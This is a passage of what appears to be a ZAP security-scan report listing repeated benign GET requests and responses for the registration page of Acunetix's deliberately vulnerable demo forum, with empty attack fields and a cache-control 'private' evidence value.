name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" 